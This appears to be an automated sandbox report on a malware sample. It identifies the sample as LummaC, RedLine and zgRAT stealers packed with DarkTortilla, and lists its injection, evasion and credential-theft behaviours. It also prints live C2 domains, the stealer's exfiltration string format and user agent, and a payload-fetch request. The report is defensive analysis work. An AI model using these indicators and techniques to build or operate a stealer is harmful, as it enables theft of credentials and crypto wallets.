Edit tour

Windows Analysis Report
2M1NS61GG8.exe

Overview

General Information

Sample name:	2M1NS61GG8.exe renamed because original name is a hash value
Original sample name:	c7eea9d0d8f7bf74bd7c25990458bcf8.exe
Analysis ID:	1429054
MD5:	c7eea9d0d8f7bf74bd7c25990458bcf8
SHA1:	4a03f78ca6f3df3c692ad31d2bdee7cb58b86c3d
SHA256:	28794b11097d9740a1bfce3e06458bccdccc167ceb75a140b4d031d052528d10
Tags:	32exe
Infos:

Detection

LummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, RedLine, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected DarkTortilla Crypter

Yara detected LummaC Stealer

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code contains very large array initializations

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Installs new ROOT certificates

LummaC encrypted strings found

Machine Learning detection for sample

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to launch a process as a different user

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops certificate files (DER)

Enables debug privileges

Enables security privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

2M1NS61GG8.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\2M1NS61GG8.exe" MD5: C7EEA9D0D8F7BF74BD7C25990458BCF8)

AddInProcess32.exe (PID: 7520 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

AddInProcess32.exe (PID: 7592 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

AddInProcess32.exe (PID: 7600 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

InstallUtil.exe (PID: 8072 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

conhost.exe (PID: 3492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AddInProcess32.exe (PID: 7984 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-lummac2-94111d4b1e11	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
DarkTortilla	DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.	No Attribution	https://www.secureworks.com/research/darktortilla-malware-analysis	https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: LummaC

{"C2 url": ["wifeplasterbakewis.shop", "mealplayerpreceodsju.shop", "bordersoarmanusjuw.shop", "suitcaseacanehalk.shop", "absentconvicsjawun.shop", "pushjellysingeywus.shop", "economicscreateojsu.shop", "entitlementappwo.shop", "rocketmusclesksj.shop"], "Build id": "A99MuA--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.2503804828.0000000003849000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000004.00000002.2503804828.0000000003849000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000009.00000002.2478972783.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000009.00000002.2478972783.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000004.00000002.2512707463.0000000004FF0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000004.00000002.2503804828.0000000003A79000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000004.00000002.2503804828.0000000003A79000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000004.00000002.2503804828.00000000038EA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000004.00000002.2503804828.00000000038EA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000008.00000002.2498975531.0000000000CD9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2478930846.00000000027E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
Process Memory Space: 2M1NS61GG8.exe PID: 7272	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: AddInProcess32.exe PID: 7600	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
Process Memory Space: AddInProcess32.exe PID: 7600	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: AddInProcess32.exe PID: 7984	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.AddInProcess32.exe.4ff0000.3.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
4.2.AddInProcess32.exe.4ff0000.3.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
4.2.AddInProcess32.exe.3939ec0.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
4.2.AddInProcess32.exe.3939ec0.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.2.AddInProcess32.exe.3939ec0.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.2.AddInProcess32.exe.3939ec0.1.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x510a9:$s1: file:/// 0x50fe1:$s2: {11111-22222-10009-11112} 0x51039:$s3: {11111-22222-50001-00000} 0x4dbbd:$s4: get_Module 0x48dc3:$s5: Reverse 0x4965c:$s6: BlockCopy 0x48dab:$s7: ReadByte 0x510bb:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
4.2.AddInProcess32.exe.3939ec0.1.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
4.2.AddInProcess32.exe.3939ec0.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.2.AddInProcess32.exe.3939ec0.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.2.AddInProcess32.exe.3939ec0.1.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x4f2a9:$s1: file:/// 0x4f1e1:$s2: {11111-22222-10009-11112} 0x4f239:$s3: {11111-22222-50001-00000} 0x4bdbd:$s4: get_Module 0x46fc3:$s5: Reverse 0x4785c:$s6: BlockCopy 0x46fab:$s7: ReadByte 0x4f2bb:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
4.2.AddInProcess32.exe.3afcb18.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
4.2.AddInProcess32.exe.3afcb18.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.2.AddInProcess32.exe.3afcb18.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.2.AddInProcess32.exe.3afcb18.0.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x510a9:$s1: file:/// 0x50fe1:$s2: {11111-22222-10009-11112} 0x51039:$s3: {11111-22222-50001-00000} 0x4dbbd:$s4: get_Module 0x48dc3:$s5: Reverse 0x4965c:$s6: BlockCopy 0x48dab:$s7: ReadByte 0x510bb:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
4.2.AddInProcess32.exe.3ad4af8.2.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
4.2.AddInProcess32.exe.3ad4af8.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.2.AddInProcess32.exe.3ad4af8.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.2.AddInProcess32.exe.3ad4af8.2.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x790c9:$s1: file:/// 0x79001:$s2: {11111-22222-10009-11112} 0x79059:$s3: {11111-22222-50001-00000} 0x75bdd:$s4: get_Module 0x70de3:$s5: Reverse 0x7167c:$s6: BlockCopy 0x70dcb:$s7: ReadByte 0x790db:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
4.2.AddInProcess32.exe.3ad4af8.2.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
4.2.AddInProcess32.exe.3ad4af8.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.2.AddInProcess32.exe.3ad4af8.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.2.AddInProcess32.exe.3ad4af8.2.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x76ec9:$s1: file:/// 0x76e01:$s2: {11111-22222-10009-11112} 0x76e59:$s3: {11111-22222-50001-00000} 0x739dd:$s4: get_Module 0x6ebe3:$s5: Reverse 0x6f47c:$s6: BlockCopy 0x6ebcb:$s7: ReadByte 0x76edb:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
4.2.AddInProcess32.exe.3afcb18.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
4.2.AddInProcess32.exe.3afcb18.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.2.AddInProcess32.exe.3afcb18.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.2.AddInProcess32.exe.3afcb18.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x4f2a9:$s1: file:/// 0x4f1e1:$s2: {11111-22222-10009-11112} 0x4f239:$s3: {11111-22222-50001-00000} 0x4bdbd:$s4: get_Module 0x46fc3:$s5: Reverse 0x4785c:$s6: BlockCopy 0x46fab:$s7: ReadByte 0x4f2bb:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
9.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
9.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
9.2.InstallUtil.exe.400000.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x510a9:$s1: file:/// 0x50fe1:$s2: {11111-22222-10009-11112} 0x51039:$s3: {11111-22222-50001-00000} 0x4dbbd:$s4: get_Module 0x48dc3:$s5: Reverse 0x4965c:$s6: BlockCopy 0x48dab:$s7: ReadByte 0x510bb:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
Click to see the 25 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 2M1NS61GG8.exe

Avira: detected

Found malware configuration

Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["wifeplasterbakewis.shop", "mealplayerpreceodsju.shop", "bordersoarmanusjuw.shop", "suitcaseacanehalk.shop", "absentconvicsjawun.shop", "pushjellysingeywus.shop", "economicscreateojsu.shop", "entitlementappwo.shop", "rocketmusclesksj.shop"], "Build id": "A99MuA--"}

Multi AV Scanner detection for domain / URL

Source: economicscreateojsu.shop	Virustotal: Detection: 13%	Perma Link
Source: mealplayerpreceodsju.shop	Virustotal: Detection: 18%	Perma Link
Source: entitlementappwo.shop	Virustotal: Detection: 17%	Perma Link

Multi AV Scanner detection for submitted file

Source: 2M1NS61GG8.exe	ReversingLabs: Detection: 39%
Source: 2M1NS61GG8.exe	Virustotal: Detection: 32%			Perma Link

Machine Learning detection for sample

Source: 2M1NS61GG8.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack	String decryptor: wifeplasterbakewis.shop
Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack	String decryptor: mealplayerpreceodsju.shop
Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack	String decryptor: bordersoarmanusjuw.shop
Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack	String decryptor: suitcaseacanehalk.shop
Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack	String decryptor: absentconvicsjawun.shop
Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack	String decryptor: pushjellysingeywus.shop
Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack	String decryptor: economicscreateojsu.shop
Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack	String decryptor: entitlementappwo.shop
Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack	String decryptor: rocketmusclesksj.shop
Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack	String decryptor: TeslaBrowser/5.5
Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack	String decryptor: - Screen Resoluton:
Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack	String decryptor: - Physical Installed Memory:
Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack	String decryptor: Workgroup: -
Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack	String decryptor: A99MuA--

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 8_2_00415C49 CryptUnprotectData,

8_2_00415C49

Source: 2M1NS61GG8.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Jump to behavior

Source: unknown	HTTPS traffic detected: 169.197.85.95:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.243:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.243:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.243:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.243:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.243:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.243:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.243:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.243:443 -> 192.168.2.4:49749 version: TLS 1.2

Source: 2M1NS61GG8.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dllO source: InstallUtil.exe, 00000009.00000002.2485480778.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 00000009.00000002.2485480778.0000000002F2E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.2485480778.0000000002F2E000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 5C3924FCh	8_2_0041504B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then mov word ptr [eax], cx	8_2_0041D030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then mov ecx, dword ptr [esp+44h]	8_2_0043703B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then mov word ptr [eax], cx	8_2_0041D3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then mov ecx, dword ptr [esp+04h]	8_2_00418533
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then mov ecx, dword ptr [esp+08h]	8_2_00402A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then cmp dword ptr [eax+edi*8], 5C3924FCh	8_2_00421A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	8_2_00409E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then mov byte ptr [ecx], al	8_2_00416ECD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	8_2_00417F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then cmp word ptr [ebx+esi+02h], 0000h	8_2_0041B0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then mov ecx, dword ptr [esi+20h]	8_2_004112B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then cmp dword ptr [ecx+ebx*8], 904D52BCh	8_2_00417349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	8_2_0040D360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp eax	8_2_00439376
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then mov byte ptr [ecx], al	8_2_00416ECD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then mov ecx, dword ptr [esi+5Ch]	8_2_00424461
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 5C3924FCh	8_2_00417491
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 0AB35B01h	8_2_00413499
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	8_2_00402580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp ebx	8_2_00439603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then mov word ptr [eax], cx	8_2_0041562F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp esi	8_2_0043974A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then mov byte ptr [ebx], dl	8_2_00425754
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then mov byte ptr [ebx], dl	8_2_0042576E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then mov word ptr [eax], dx	8_2_0041A8E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then mov edx, dword ptr [esi+70h]	8_2_00417945
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then dec esi	8_2_00439902
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then mov ecx, dword ptr [esp+00000080h]	8_2_004099D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then jmp ecx	8_2_00439A76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then mov byte ptr [ecx], al	8_2_00416ADD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then inc ebx	8_2_00414AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	8_2_00436CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then mov word ptr [ebx], cx	8_2_00414ED2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then mov dword ptr [esi+08h], ecx	8_2_00424FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4x nop then cmp byte ptr [ecx], 00000000h	8_2_00413F8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	9_2_050CA5A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	9_2_050CD9A8

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: wifeplasterbakewis.shop
Source: Malware configuration extractor	URLs: mealplayerpreceodsju.shop
Source: Malware configuration extractor	URLs: bordersoarmanusjuw.shop
Source: Malware configuration extractor	URLs: suitcaseacanehalk.shop
Source: Malware configuration extractor	URLs: absentconvicsjawun.shop
Source: Malware configuration extractor	URLs: pushjellysingeywus.shop
Source: Malware configuration extractor	URLs: economicscreateojsu.shop
Source: Malware configuration extractor	URLs: entitlementappwo.shop
Source: Malware configuration extractor	URLs: rocketmusclesksj.shop

Source: global traffic

HTTP traffic detected: GET /bLNQtdR/1667-Final.webp HTTP/1.1Host: i.ibb.coConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 169.197.85.95 169.197.85.95

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

